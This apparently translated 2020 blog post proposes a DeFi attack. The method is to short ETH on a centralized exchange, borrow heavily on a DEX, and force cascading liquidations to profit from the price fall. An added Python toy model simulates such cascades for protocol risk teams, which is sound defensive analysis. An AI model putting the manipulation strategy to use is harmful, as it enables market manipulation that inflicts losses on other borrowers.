An Analysis of Another Kind of DeFi Vulnerability Beyond Flash Loans


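DeFi has recently become a very hot concept in the blockchain world. The recent FCoin exit in particular has made people distrust centralized exchanges, and KNC, which had long been lukewarm, rose 8x on the back of the DeFi concept, arguably the biggest highlight of the crypto market this year. Flash loans are one of DeFi's innovative experiments and have recently become a focus of outside attention: two hackers used flash loans to attack the margin trading protocol bZx. The first incident had an arbitrage amount of USD 350,000, and it was followed by a copycat attack with an arbitrage amount of USD 600,000.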

So today the author ventures to put forward another vulnerability in the DeFi model:

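1. Slowly open a short position in ETH on a centralized platform, and borrow an equal amount of ETH on a DEX, say 100,000 ETH; the larger the amount, the easier it is to succeed.

2. One of two scenarios then follows:

a. The price falls sharply away from the price at the time of borrowing and crosses the DEX liquidation line, triggering cascading liquidations on the DEX, and the price keeps dropping. The part of the move on the centralized platform that lies below the DEX lending liquidation line is then one's own profit.

b. The price rises sharply away from the price at the time of borrowing and crosses the centralized exchange's liquidation line. Because liquidity on the centralized exchange is relatively ample, this does not trigger cascading liquidations; in that case the ETH is returned on the DEX and the loss is the interest.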

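Compared with flash loans, the attack above is far less time-sensitive: the position can be opened slowly, whereas a flash loan attack has to be completed quickly to have any chance of profit. This model does, however, demand a large amount of capital. If it cannot force a large move through the liquidation line, it cannot make a profit either, although the loss is then only the interest.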
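The cascade in scenario (a) can be stress-tested from the protocol side. The following is an added example, not code from the original post: a toy model that a lending protocol's risk team could run against its loan book to see how far one large sell propagates. The linear price-impact model, the 150% collateral ratio, the market depth and the loan book are all constructed assumptions.

```python
from dataclasses import dataclass

LIQ_RATIO = 1.5          # assumed: liquidate when collateral value < 150% of debt
DEPTH_ETH_PER_USD = 100  # assumed market depth: 100 ETH sold moves price 1 USD


@dataclass
class Position:
    name: str
    collateral_eth: float
    debt_usd: float

    def liquidation_price(self) -> float:
        return LIQ_RATIO * self.debt_usd / self.collateral_eth


def cascade(positions, start_price, shock_eth, depth=DEPTH_ETH_PER_USD):
    """Return (final_price, liquidated_names, rounds) after an initial sell."""
    price = max(start_price - shock_eth / depth, 0.0)
    open_pos, liquidated, rounds = list(positions), [], 0
    while True:
        hit = [p for p in open_pos
               if p.collateral_eth * price < LIQ_RATIO * p.debt_usd]
        if not hit:
            return price, liquidated, rounds
        rounds += 1
        sold = sum(p.collateral_eth for p in hit)  # seized collateral is sold
        price = max(price - sold / depth, 0.0)     # which pushes the price down
        liquidated += [p.name for p in hit]
        open_pos = [p for p in open_pos if p not in hit]


# Constructed loan book; liquidation prices are 195, 187.5, 150 and 170 USD.
BOOK = [
    Position("A", 1000, 130_000),
    Position("B", 2000, 250_000),
    Position("C", 500, 50_000),
    Position("D", 3000, 340_000),
]

if __name__ == "__main__":
    for shock in (400, 600):
        print(shock, cascade(BOOK, 200.0, shock))
    # Deeper liquidity absorbs the same 600 ETH sell without any liquidation.
    print(cascade(BOOK, 200.0, 600, depth=500))
```

In this constructed book a 400 ETH sell liquidates nothing, a 600 ETH sell unwinds every position over four rounds, and five times the market depth absorbs the 600 ETH sell entirely, which is why thin liquidity and tightly clustered liquidation prices are the parameters to monitor.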


  admin   2020-3-8
